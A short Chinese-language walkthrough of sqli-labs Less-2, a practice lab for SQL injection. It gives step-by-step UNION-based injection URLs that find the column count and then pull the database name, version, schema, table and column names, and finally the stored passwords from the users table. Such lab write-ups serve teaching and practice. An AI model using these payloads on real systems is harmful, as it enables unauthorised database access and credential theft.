sqli-labs闯关1-2
进入页面http://43.247.91.228:84/Less-2/
输入?id=1
http://43.247.91.228:84/Less-2/?id=1
输入?id=1’
http://43.247.91.228:84/Less-2/?id=1’
输入?id=1 and 1=1
http://43.247.91.228:84/Less-2/?id=1 and 1=1
?id=1 and 1=1
http://43.247.91.228:84/Less-2/?id=1 and 1=2
根据结果可以判断该sql注入为数字型注入
接下来http://43.247.91.228:84/Less-2/?id=1 order by 4–+
得出有三列
判断回显位数http://43.247.91.228:84/Less-2/?id=99 union select 1,2,3–+
查看数据库名称http://43.247.91.228:84/Less-2/?id=99 union select 1,(select database()),3–+
查看数据库版本http://43.247.91.228:84/Less-2/?id=99 union select 1,(select version()),3–+
查看数据库名
http://43.247.91.228:84/Less-2/?id=99 union select 1,(select group_concat(schema_name) from information_schema.schemata ),3–+
查看当前数据库内的表名
http://43.247.91.228:84/Less-2/?id=99 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ),3–+
查看users表中各字段
http://43.247.91.228:84/Less-2/?id=99 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ ),3–+
查看password表中各字段
http://43.247.91.228:84/Less-2/?id=99 union select 1,2,(select group_concat(password) from security.users )–+